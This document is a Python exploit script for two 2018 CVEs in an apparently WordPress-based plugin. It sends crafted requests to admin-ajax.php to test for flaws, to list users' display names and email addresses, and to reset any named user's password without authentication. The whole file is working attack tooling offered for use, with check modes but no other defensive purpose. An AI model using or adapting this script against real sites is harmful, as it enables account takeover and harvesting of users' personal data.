###### CVE-2018-19487 exploit ######
###### CVE-2018-19488 exploit ######
###### Written by Anthony Maestre ######

import requests, urllib, re, sys, json


def checkenum():
	print 'Domaine: ' + sys.argv[2]
	check = urllib.urlencode({'cs_uid': 1, 'action': 'cs_employer_ajax_profile'})
        headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
        res = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=check, headers=headers, verify=False)
        if res.status_code == 200:
            print '\nVulnerable to users enumeration !'
        else:
            print '\nNOT Vulnerable to users enumeration.'
        

def checkreset():
        print 'Domaine: ' + sys.argv[2]
        check2 = urllib.urlencode({'new_pass': 'admin', 'confirm_new_pass': 'admin', 'user_login': "", 'action': 'cs_reset_pass'})
        headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
        data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=check2, headers=headers, verify=False)

        res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
        for i in res:
            if i == str('icon-warning4') and data.status_code == 200:
                print '\nVulnerable to password reset !'
            else:
                print '\nNOT vulnerable to password reset.'


def enum():
	print 'Domaine: ' + sys.argv[2]
	for i in range(5):
		enum = urllib.urlencode({'cs_uid': i, 'action': 'cs_employer_ajax_profile'})
		headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
         	data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=enum, headers=headers, verify=False)

		login = re.findall(r'name="display_name" value=\"(.*?)\"',str(data.content))
		mail = re.findall(r'name="user_email" value=\"(.*?)\"',str(data.content))
		for user in login:
			for address in mail:
				print "uid " + str(i) +" : " + user + "  " + address


def reset():
        print 'Domaine: ' + sys.argv[2]
        login = raw_input("User: ")
        pw = raw_input('New password: ')
        reset = urllib.urlencode({'new_pass': pw, 'confirm_new_pass': pw, 'user_login': login, 'action': 'cs_reset_pass'})
        headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0"}
        data = requests.post(sys.argv[2] + "/wp-admin/admin-ajax.php", data=reset, headers=headers, verify=False)

        res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
        for i in res:
            if i == str('icon-checkmark6') and data.status_code == 200:
                print '\nPassword successfully reset ! =)'
            else:
                print '\nError ! Cannot reset password.'



if len(sys.argv) < 3 or len(sys.argv) > 3 or sys.argv[1] == "--help":
    print '\n--checkenum [http(s)://domain] to test if vulnerable to users enumeration'
    print '\n--checkreset [http(s)://domain] to test if vulnerable to password reset'
    print '\n--enum [http(s)://domain] to enum users'
    print '\n--reset [http(s)://domain] to reset user password\n' 

elif sys.argv[1] == "--checkenum":
    checkenum()

elif sys.argv[1] == "--checkreset":
    checkreset()

elif sys.argv[1] == "--enum":
    enum()

elif sys.argv[1] == "--reset":
    reset()